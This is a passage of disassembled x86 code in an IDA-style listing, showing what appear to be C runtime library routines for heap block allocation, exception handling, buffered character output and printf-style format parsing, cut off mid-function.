loc_406395: ; CODE XREF: sub_4062F9+8E�j
cmp ebx, eax
jb short loc_406389
loc_406399: ; CODE XREF: sub_4062F9+94�j
cmp ebx, eax
jnz short loc_4063CE
mov ebx, ds:dword_434DE0
jmp short loc_4063AE
; ---------------------------------------------------------------------------
loc_4063A5: ; CODE XREF: sub_4062F9+BA�j
cmp dword ptr [ebx+8], 0
jnz short loc_4063B5
add ebx, 14h
loc_4063AE: ; CODE XREF: sub_4062F9+AA�j
cmp ebx, ecx
mov [ebp+arg_0], ebx
jb short loc_4063A5
loc_4063B5: ; CODE XREF: sub_4062F9+B0�j
cmp ebx, ecx
jnz short loc_4063CE
call sub_405E64
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jnz short loc_4063CE
loc_4063C7: ; CODE XREF: sub_4062F9+E7�j
xor eax, eax
jmp loc_4065D7
; ---------------------------------------------------------------------------
loc_4063CE: ; CODE XREF: sub_4062F9+A2�j
; sub_4062F9+BE�j ...
push ebx
call sub_405F14
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_4063C7
loc_4063E2: ; CODE XREF: sub_4062F9+68�j
; sub_4062F9+8C�j
mov ds:dword_434DE8, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_406409
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_406432
loc_406409: ; CODE XREF: sub_4062F9+FA�j
and [ebp+var_4], 0
mov edx, [eax+0C4h]
lea ecx, [eax+44h]
loc_406416: ; CODE XREF: sub_4062F9+134�j
mov edi, [ecx]
and edx, [ebp+var_8]
and edi, esi
or edx, edi
jnz short loc_40642F
inc [ebp+var_4]
mov edx, [ecx+84h]
add ecx, 4
jmp short loc_406416
; ---------------------------------------------------------------------------
loc_40642F: ; CODE XREF: sub_4062F9+126�j
mov edx, [ebp+var_4]
loc_406432: ; CODE XREF: sub_4062F9+10E�j
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
xor edi, edi
and ecx, esi
jnz short loc_406460
mov ecx, [eax+edx*4+0C4h]
and ecx, [ebp+var_8]
push 20h
pop edi
jmp short loc_406460
; ---------------------------------------------------------------------------
loc_40645D: ; CODE XREF: sub_4062F9+169�j
add ecx, ecx
inc edi
loc_406460: ; CODE XREF: sub_4062F9+153�j
; sub_4062F9+162�j
test ecx, ecx
jge short loc_40645D
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+var_8], ecx
jle short loc_406481
push 3Fh
pop esi
loc_406481: ; CODE XREF: sub_4062F9+183�j
cmp esi, edi
jz loc_40658A
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_4064ED
cmp edi, 20h
mov ebx, 80000000h
jge short loc_4064C1
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_4064EA
mov ecx, [ebp+var_14]
mov ebx, [ebp+arg_0]
and [ebx], ecx
jmp short loc_4064ED
; ---------------------------------------------------------------------------
loc_4064C1: ; CODE XREF: sub_4062F9+1A0�j
lea ecx, [edi-20h]
shr ebx, cl
mov ecx, [ebp+var_4]
lea ecx, [eax+ecx*4+0C4h]
lea edi, [eax+edi+4]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_4064EA
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_4064ED
; ---------------------------------------------------------------------------
loc_4064EA: ; CODE XREF: sub_4062F9+1BC�j
; sub_4062F9+1E4�j
mov ebx, [ebp+arg_0]
loc_4064ED: ; CODE XREF: sub_4062F9+196�j
; sub_4062F9+1C6�j ...
cmp [ebp+var_8], 0
mov ecx, [edx+8]
mov edi, [edx+4]
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_406596
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [edx+8], ecx
mov [edx+4], edi
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_406587
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_0+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jge short loc_40655E
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_40654C
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_40654C: ; CODE XREF: sub_4062F9+246�j
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_406587
; ---------------------------------------------------------------------------
loc_40655E: ; CODE XREF: sub_4062F9+240�j
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_406571
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_406571: ; CODE XREF: sub_4062F9+269�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_406587: ; CODE XREF: sub_4062F9+22E�j
; sub_4062F9+263�j
mov ecx, [ebp+var_8]
loc_40658A: ; CODE XREF: sub_4062F9+18A�j
test ecx, ecx
jz short loc_406599
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_406599
; ---------------------------------------------------------------------------
loc_406596: ; CODE XREF: sub_4062F9+20A�j
mov ecx, [ebp+var_8]
loc_406599: ; CODE XREF: sub_4062F9+293�j
; sub_4062F9+29B�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_4065CF
cmp ebx, ds:dword_425F6C
jnz short loc_4065CF
mov ecx, [ebp+var_4]
cmp ecx, ds:dword_434DF0
jnz short loc_4065CF
and ds:dword_425F6C, 0
loc_4065CF: ; CODE XREF: sub_4062F9+2BA�j
; sub_4062F9+2C2�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_4065D7: ; CODE XREF: sub_4062F9+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_4062F9 endp
; [00000045 BYTES: COLLAPSED FUNCTION __SEH_prolog4. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __SEH_epilog4. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
sub_406640 proc near ; DATA XREF: __SEH_prolog4�o
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 004086D1 SIZE 00000019 BYTES
sub esp, 14h
push ebx
mov ebx, [esp+18h+arg_4]
push ebp
push esi
mov esi, [ebx+8]
xor esi, ds:dword_423064
push edi
mov eax, [esi]
cmp eax, 0FFFFFFFEh
mov [esp+24h+var_11], 0
mov [esp+24h+var_C], 1
lea edi, [ebx+10h]
jz short loc_406678
mov ecx, [esi+4]
add ecx, edi
xor ecx, [eax+edi]
call sub_402710
loc_406678: ; CODE XREF: sub_406640+29�j
mov ecx, [esi+0Ch]
mov eax, [esi+8]
add ecx, edi
xor ecx, [eax+edi]
call sub_402710
mov eax, [esp+24h+arg_0]
test byte ptr [eax+4], 66h
jnz loc_4067B5
mov ebp, [ebx+0Ch]
cmp ebp, 0FFFFFFFEh
mov ecx, [esp+24h+arg_8]
lea edx, [esp+24h+var_8]
mov [esp+24h+var_8], eax
mov [esp+24h+var_4], ecx
mov [ebx-4], edx
jz short loc_40670F
loc_4066B1: ; CODE XREF: sub_406640+A2�j
lea eax, [ebp+ebp*2+0]
mov ecx, [esi+eax*4+14h]
test ecx, ecx
lea ebx, [esi+eax*4+10h]
mov eax, [ebx]
mov [esp+24h+var_10], eax
jz short loc_4066DD
mov edx, edi
call sub_4086BA
test eax, eax
mov [esp+24h+var_11], 1
jl short loc_40671B
jg short loc_406725
mov eax, [esp+24h+var_10]
loc_4066DD: ; CODE XREF: sub_406640+85�j
cmp eax, 0FFFFFFFEh
mov ebp, eax
jnz short loc_4066B1
cmp [esp+24h+var_11], 0
jz short loc_40670F
loc_4066EB: ; CODE XREF: sub_406640+E3�j
; sub_406640+191�j
mov eax, [esi]
cmp eax, 0FFFFFFFEh
jz short loc_4066FF
mov ecx, [esi+4]
add ecx, edi
xor ecx, [eax+edi]
call sub_402710
loc_4066FF: ; CODE XREF: sub_406640+B0�j
mov ecx, [esi+0Ch]
mov eax, [esi+8]
add ecx, edi
xor ecx, [eax+edi]
call sub_402710
loc_40670F: ; CODE XREF: sub_406640+6F�j
; sub_406640+A9�j ...
mov eax, [esp+24h+var_C]
pop edi
pop esi
pop ebp
pop ebx
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_40671B: ; CODE XREF: sub_406640+95�j
mov [esp+24h+var_C], 0
jmp short loc_4066EB
; ---------------------------------------------------------------------------
loc_406725: ; CODE XREF: sub_406640+97�j
mov ecx, [esp+24h+arg_0]
cmp dword ptr [ecx], 0E06D7363h
jnz short loc_40675B
cmp ds:off_41DC1C, 0
jz short loc_40675B
push offset off_41DC1C
call sub_40CC52
add esp, 4
test eax, eax
jz short loc_40675B
mov edx, [esp+24h+arg_0]
push 1
push edx
call ds:off_41DC1C
add esp, 8
loc_40675B: ; CODE XREF: sub_406640+EF�j
; sub_406640+F8�j ...
mov ecx, [esp+24h+arg_4]
call sub_4086EA
mov eax, [esp+24h+arg_4]
cmp [eax+0Ch], ebp
jz short loc_406780
push offset dword_423064
push edi
mov edx, ebp
mov ecx, eax
call sub_408704
mov eax, [esp+24h+arg_4]
loc_406780: ; CODE XREF: sub_406640+12B�j
mov ecx, [esp+24h+var_10]
mov [eax+0Ch], ecx
mov eax, [esi]
cmp eax, 0FFFFFFFEh
jz short loc_40679B
mov ecx, [esi+4]
add ecx, edi
xor ecx, [eax+edi]
call sub_402710
loc_40679B: ; CODE XREF: sub_406640+14C�j
mov ecx, [esi+0Ch]
mov edx, [esi+8]
add ecx, edi
xor ecx, [edx+edi]
call sub_402710
mov ecx, [ebx+8]
mov edx, edi
jmp loc_4086D1
; ---------------------------------------------------------------------------
loc_4067B5: ; CODE XREF: sub_406640+50�j
cmp dword ptr [ebx+0Ch], 0FFFFFFFEh
jz loc_40670F
push offset dword_423064
push edi
mov ecx, ebx
mov edx, 0FFFFFFFEh
call sub_408704
jmp loc_4066EB
sub_406640 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4067D6 proc near ; CODE XREF: sub_402AEE+9F�p
; sub_4030B5+6E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+arg_4]
push esi
call sub_408A20
mov [ebp+arg_4], eax
mov eax, [esi+0Ch]
test al, 82h
pop ecx
jnz short loc_406806
call sub_4057D3
mov dword ptr [eax], 9
loc_4067FA: ; CODE XREF: sub_4067D6+3F�j
or dword ptr [esi+0Ch], 20h
or eax, 0FFFFFFFFh
jmp loc_406933
; ---------------------------------------------------------------------------
loc_406806: ; CODE XREF: sub_4067D6+17�j
test al, 40h
jz short loc_406817
call sub_4057D3
mov dword ptr [eax], 22h
jmp short loc_4067FA
; ---------------------------------------------------------------------------
loc_406817: ; CODE XREF: sub_4067D6+32�j
push ebx
xor ebx, ebx
test al, 1
jz short loc_406834
test al, 10h
mov [esi+4], ebx
jz loc_4068AE
mov ecx, [esi+8]
and eax, 0FFFFFFFEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_406834: ; CODE XREF: sub_4067D6+46�j
mov eax, [esi+0Ch]
and eax, 0FFFFFFEFh
or eax, 2
test ax, 10Ch
mov [esi+0Ch], eax
mov [esi+4], ebx
mov [ebp+var_4], ebx
jnz short loc_406878
call sub_408084
add eax, 20h
cmp esi, eax
jz short loc_406864
call sub_408084
add eax, 40h
cmp esi, eax
jnz short loc_406871
loc_406864: ; CODE XREF: sub_4067D6+80�j
push [ebp+arg_4]
call sub_40D540
test eax, eax
pop ecx
jnz short loc_406878
loc_406871: ; CODE XREF: sub_4067D6+8C�j
push esi
call sub_40D4FC
pop ecx
loc_406878: ; CODE XREF: sub_4067D6+74�j
; sub_4067D6+99�j
test word ptr [esi+0Ch], 108h
push edi
jz loc_406905
mov eax, [esi+8]
mov edi, [esi]
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
sub edi, eax
dec ecx
cmp edi, ebx
mov [esi+4], ecx
jle short loc_4068B9
push edi
push eax
push [ebp+arg_4]
call sub_40D420
add esp, 0Ch
mov [ebp+var_4], eax
jmp short loc_4068FB
; ---------------------------------------------------------------------------
loc_4068AE: ; CODE XREF: sub_4067D6+4D�j
or eax, 20h
mov [esi+0Ch], eax
or eax, 0FFFFFFFFh
jmp short loc_406932
; ---------------------------------------------------------------------------
loc_4068B9: ; CODE XREF: sub_4067D6+C4�j
mov ecx, [ebp+arg_4]
cmp ecx, 0FFFFFFFFh
jz short loc_4068DC
cmp ecx, 0FFFFFFFEh
jz short loc_4068DC
mov eax, ecx
and eax, 1Fh
imul eax, 28h
mov edx, ecx
sar edx, 5
add eax, ds:dword_433CA0[edx*4]
jmp short loc_4068E1
; ---------------------------------------------------------------------------
loc_4068DC: ; CODE XREF: sub_4067D6+E9�j
; sub_4067D6+EE�j
mov eax, offset dword_423BD0
loc_4068E1: ; CODE XREF: sub_4067D6+104�j
test byte ptr [eax+4], 20h
jz short loc_4068FB
push 2
push ebx
push ebx
push ecx
call sub_40CD41
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_406920
loc_4068FB: ; CODE XREF: sub_4067D6+D6�j
; sub_4067D6+10F�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_40691B
; ---------------------------------------------------------------------------
loc_406905: ; CODE XREF: sub_4067D6+A9�j
xor edi, edi
inc edi
push edi
lea eax, [ebp+arg_0]
push eax
push [ebp+arg_4]
call sub_40D420
add esp, 0Ch
mov [ebp+var_4], eax
loc_40691B: ; CODE XREF: sub_4067D6+12D�j
cmp [ebp+var_4], edi
jz short loc_406929
loc_406920: ; CODE XREF: sub_4067D6+123�j
or dword ptr [esi+0Ch], 20h
or eax, 0FFFFFFFFh
jmp short loc_406931
; ---------------------------------------------------------------------------
loc_406929: ; CODE XREF: sub_4067D6+148�j
mov eax, [ebp+arg_0]
and eax, 0FFh
loc_406931: ; CODE XREF: sub_4067D6+151�j
pop edi
loc_406932: ; CODE XREF: sub_4067D6+E1�j
pop ebx
loc_406933: ; CODE XREF: sub_4067D6+2B�j
pop esi
leave
retn
sub_4067D6 endp
; =============== S U B R O U T I N E =======================================
sub_406936 proc near ; CODE XREF: sub_406969+11�p
; sub_40698D+22�p ...
test byte ptr [ecx+0Ch], 40h
jz short loc_406942
cmp dword ptr [ecx+8], 0
jz short loc_406966
loc_406942: ; CODE XREF: sub_406936+4�j
dec dword ptr [ecx+4]
js short loc_406952
mov edx, [ecx]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_40695E
; ---------------------------------------------------------------------------
loc_406952: ; CODE XREF: sub_406936+F�j
movsx eax, al
push ecx
push eax
call sub_4067D6
pop ecx
pop ecx
loc_40695E: ; CODE XREF: sub_406936+1A�j
cmp eax, 0FFFFFFFFh
jnz short loc_406966
or [esi], eax
retn
; ---------------------------------------------------------------------------
loc_406966: ; CODE XREF: sub_406936+A�j
; sub_406936+2B�j
inc dword ptr [esi]
retn
sub_406936 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406969 proc near ; CODE XREF: sub_4069D7+853�p
; sub_4069D7+880�p ...
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
mov esi, eax
jmp short loc_406984
; ---------------------------------------------------------------------------
loc_406971: ; CODE XREF: sub_406969+1F�j
mov ecx, [ebp+arg_8]
mov al, [ebp+arg_0]
dec [ebp+arg_4]
call sub_406936
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_40698A
loc_406984: ; CODE XREF: sub_406969+6�j
cmp [ebp+arg_4], 0
jg short loc_406971
loc_40698A: ; CODE XREF: sub_406969+19�j
pop esi
pop ebp
retn
sub_406969 endp
; =============== S U B R O U T I N E =======================================
sub_40698D proc near ; CODE XREF: sub_4069D7+867�p
; sub_4069D7+8CE�p ...
arg_0 = dword ptr 4
test byte ptr [edi+0Ch], 40h
push ebx
push esi
mov esi, eax
mov ebx, ecx
jz short loc_4069CD
cmp dword ptr [edi+8], 0
jnz short loc_4069CD
mov eax, [esp+8+arg_0]
add [esi], eax
jmp short loc_4069D4
; ---------------------------------------------------------------------------
loc_4069A7: ; CODE XREF: sub_40698D+45�j
mov al, [ebx]
dec [esp+8+arg_0]
mov ecx, edi
call sub_406936
inc ebx
cmp dword ptr [esi], 0FFFFFFFFh
jnz short loc_4069CD
call sub_4057D3
cmp dword ptr [eax], 2Ah
jnz short loc_4069D4
mov ecx, edi
mov al, 3Fh
call sub_406936
loc_4069CD: ; CODE XREF: sub_40698D+A�j
; sub_40698D+10�j ...
cmp [esp+8+arg_0], 0
jg short loc_4069A7
loc_4069D4: ; CODE XREF: sub_40698D+18�j
; sub_40698D+35�j
pop esi
pop ebx
retn
sub_40698D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=1F8h
sub_4069D7 proc near ; CODE XREF: sub_402AEE+80�p
; sub_4030B5+53�p ...
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_260 = dword ptr -260h
var_25C = byte ptr -25Ch
var_254 = dword ptr -254h
var_250 = byte ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_244 = dword ptr -244h
var_240 = dword ptr -240h
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_230 = byte ptr -230h
var_22F = byte ptr -22Fh
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_211 = byte ptr -211h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_D = byte ptr -0Dh
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
lea ebp, [esp-1F8h]
sub esp, 278h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+1F8h+var_4], eax
mov eax, [ebp+1F8h+arg_0]
push ebx
mov ebx, [ebp+1F8h+arg_4]
push esi
xor esi, esi
push edi
mov edi, [ebp+1F8h+arg_C]
push [ebp+1F8h+arg_8]
lea ecx, [ebp+1F8h+var_25C]
mov [ebp+1F8h+var_228], eax
mov [ebp+1F8h+var_224], edi
mov [ebp+1F8h+var_244], esi
mov [ebp+1F8h+var_210], esi
mov [ebp+1F8h+var_238], esi
mov [ebp+1F8h+var_218], esi
mov [ebp+1F8h+var_234], esi
mov [ebp+1F8h+var_248], esi
mov [ebp+1F8h+var_23C], esi
call sub_40271F
cmp [ebp+1F8h+var_228], esi
jnz short loc_406A64
loc_406A37: ; CODE XREF: sub_4069D7+E5�j
; sub_4069D7+138�j ...
call sub_4057D3
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
push esi
loc_406A47: ; CODE XREF: sub_4069D7+948�j
call sub_402F39
add esp, 14h
cmp [ebp+1F8h+var_250], 0
jz short loc_406A5C
mov eax, [ebp+1F8h+var_254]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_406A5C: ; CODE XREF: sub_4069D7+7C�j
or eax, 0FFFFFFFFh
jmp loc_407334
; ---------------------------------------------------------------------------
loc_406A64: ; CODE XREF: sub_4069D7+5E�j
mov eax, [ebp+1F8h+var_228]
test byte ptr [eax+0Ch], 40h
jnz loc_406B15
push eax
call sub_408A20
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_406AB3
push [ebp+1F8h+var_228]
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_406AB3
push [ebp+1F8h+var_228]
call sub_408A20
push [ebp+1F8h+var_228]
sar eax, 5
lea esi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [esi]
pop ecx
pop ecx
xor esi, esi
jmp short loc_406AB8
; ---------------------------------------------------------------------------
loc_406AB3: ; CODE XREF: sub_4069D7+A4�j
; sub_4069D7+B2�j
mov eax, offset dword_423BD0
loc_406AB8: ; CODE XREF: sub_4069D7+DA�j
test byte ptr [eax+24h], 7Fh
jnz loc_406A37
push [ebp+1F8h+var_228]
call sub_408A20
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_406B06
push [ebp+1F8h+var_228]
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_406B06
push [ebp+1F8h+var_228]
call sub_408A20
push [ebp+1F8h+var_228]
sar eax, 5
lea esi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [esi]
pop ecx
pop ecx
xor esi, esi
jmp short loc_406B0B
; ---------------------------------------------------------------------------
loc_406B06: ; CODE XREF: sub_4069D7+F7�j
; sub_4069D7+105�j
mov eax, offset dword_423BD0
loc_406B0B: ; CODE XREF: sub_4069D7+12D�j
test byte ptr [eax+24h], 80h
jnz loc_406A37
loc_406B15: ; CODE XREF: sub_4069D7+94�j
cmp ebx, esi
jz loc_406A37
mov dl, [ebx]
xor ecx, ecx
test dl, dl
mov [ebp+1F8h+var_22C], esi
mov [ebp+1F8h+var_220], esi
mov [ebp+1F8h+var_24C], esi
mov [ebp+1F8h+var_211], dl
jz loc_407324
loc_406B35: ; CODE XREF: sub_4069D7+931�j
inc ebx
cmp [ebp+1F8h+var_22C], 0
mov [ebp+1F8h+var_240], ebx
jl loc_407324
mov al, dl
sub al, 20h
cmp al, 58h
ja short loc_406B5C
movsx eax, dl
movzx eax, ds:byte_41D4D8[eax]
and eax, 0Fh
xor esi, esi
jmp short loc_406B60
; ---------------------------------------------------------------------------
loc_406B5C: ; CODE XREF: sub_4069D7+172�j
xor esi, esi
xor eax, eax
loc_406B60: ; CODE XREF: sub_4069D7+183�j
movsx eax, ds:byte_41D4F8[ecx+eax*8]
push 7
sar eax, 4
pop ecx
cmp eax, ecx ; switch 8 cases
mov [ebp+1F8h+var_26C], eax
ja loc_4072F4 ; default
jmp off_40734F[eax*4] ; switch jump
loc_406B80: ; DATA XREF: .kSjx934:off_40734F�o
or [ebp+1F8h+var_218], 0FFFFFFFFh ; jumptable 00406B79 case 1
mov [ebp+1F8h+var_270], esi
mov [ebp+1F8h+var_248], esi
mov [ebp+1F8h+var_238], esi
mov [ebp+1F8h+var_234], esi
mov [ebp+1F8h+var_210], esi
mov [ebp+1F8h+var_23C], esi
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406B9B: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: .kSjx934:off_40734F�o
movsx eax, dl ; jumptable 00406B79 case 2
sub eax, 20h
jz short loc_406BE1
sub eax, 3
jz short loc_406BD5
sub eax, 8
jz short loc_406BCC
dec eax
dec eax
jz short loc_406BC3
sub eax, 3
jnz loc_4072F4 ; default
or [ebp+1F8h+var_210], 8
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406BC3: ; CODE XREF: sub_4069D7+1D8�j
or [ebp+1F8h+var_210], 4
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406BCC: ; CODE XREF: sub_4069D7+1D4�j
or [ebp+1F8h+var_210], 1
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406BD5: ; CODE XREF: sub_4069D7+1CF�j
or [ebp+1F8h+var_210], 80h
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406BE1: ; CODE XREF: sub_4069D7+1CA�j
or [ebp+1F8h+var_210], 2
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406BEA: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: .kSjx934:off_40734F�o
cmp dl, 2Ah ; jumptable 00406B79 case 3
jnz short loc_406C0F
add edi, 4
mov [ebp+1F8h+var_224], edi
mov edi, [edi-4]
cmp edi, esi
mov [ebp+1F8h+var_238], edi
jge loc_4072F4 ; default
or [ebp+1F8h+var_210], 4
neg [ebp+1F8h+var_238]
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C0F: ; CODE XREF: sub_4069D7+216�j
mov eax, [ebp+1F8h+var_238]
imul eax, 0Ah
movsx ecx, dl
lea eax, [eax+ecx-30h]
mov [ebp+1F8h+var_238], eax
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C24: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: .kSjx934:off_40734F�o
mov [ebp+1F8h+var_218], esi ; jumptable 00406B79 case 4
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C2C: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: .kSjx934:off_40734F�o
cmp dl, 2Ah ; jumptable 00406B79 case 5
jnz short loc_406C4E
add edi, 4
mov [ebp+1F8h+var_224], edi
mov edi, [edi-4]
cmp edi, esi
mov [ebp+1F8h+var_218], edi
jge loc_4072F4 ; default
or [ebp+1F8h+var_218], 0FFFFFFFFh
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C4E: ; CODE XREF: sub_4069D7+258�j
mov eax, [ebp+1F8h+var_218]
imul eax, 0Ah
movsx ecx, dl
lea eax, [eax+ecx-30h]
mov [ebp+1F8h+var_218], eax
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C63: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: .kSjx934:off_40734F�o
cmp dl, 49h ; jumptable 00406B79 case 6
jz short loc_406CAE
cmp dl, 68h
jz short loc_406CA5
cmp dl, 6Ch
jz short loc_406C87
cmp dl, 77h
jnz loc_4072F4 ; default
or [ebp+1F8h+var_210], 800h
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C87: ; CODE XREF: sub_4069D7+299�j
cmp byte ptr [ebx], 6Ch
jnz short loc_406C9C
inc ebx
or [ebp+1F8h+var_210], 1000h
mov [ebp+1F8h+var_240], ebx
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C9C: ; CODE XREF: sub_4069D7+2B3�j
or [ebp+1F8h+var_210], 10h
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406CA5: ; CODE XREF: sub_4069D7+294�j
or [ebp+1F8h+var_210], 20h
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406CAE: ; CODE XREF: sub_4069D7+28F�j
mov al, [ebx]
cmp al, 36h
jnz short loc_406CCB
cmp byte ptr [ebx+1], 34h
jnz short loc_406CCB
inc ebx
inc ebx
or [ebp+1F8h+var_210], 8000h
mov [ebp+1F8h+var_240], ebx
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406CCB: ; CODE XREF: sub_4069D7+2DB�j
; sub_4069D7+2E1�j
cmp al, 33h
jnz short loc_406CE6
cmp byte ptr [ebx+1], 32h
jnz short loc_406CE6
inc ebx
inc ebx
and [ebp+1F8h+var_210], 0FFFF7FFFh
mov [ebp+1F8h+var_240], ebx
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406CE6: ; CODE XREF: sub_4069D7+2F6�j
; sub_4069D7+2FC�j
cmp al, 64h
jz loc_4072F4 ; default
cmp al, 69h
jz loc_4072F4 ; default
cmp al, 6Fh
jz loc_4072F4 ; default
cmp al, 75h
jz loc_4072F4 ; default
cmp al, 78h
jz loc_4072F4 ; default
cmp al, 58h
jz loc_4072F4 ; default
mov [ebp+1F8h+var_26C], esi
loc_406D19: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: .kSjx934:off_40734F�o
lea eax, [ebp+1F8h+var_25C] ; jumptable 00406B79 case 0
push eax
movzx eax, dl
push eax
mov [ebp+1F8h+var_23C], esi
call sub_40CA00
pop ecx
test eax, eax
mov al, [ebp+1F8h+var_211]
pop ecx
jz short loc_406D4B
mov ecx, [ebp+1F8h+var_228]
lea esi, [ebp+1F8h+var_22C]
call sub_406936
mov al, [ebx]
inc ebx
test al, al
mov [ebp+1F8h+var_240], ebx
jz loc_40730D
loc_406D4B: ; CODE XREF: sub_4069D7+359�j
mov ecx, [ebp+1F8h+var_228]
lea esi, [ebp+1F8h+var_22C]
call sub_406936
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406D5B: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: .kSjx934:off_40734F�o
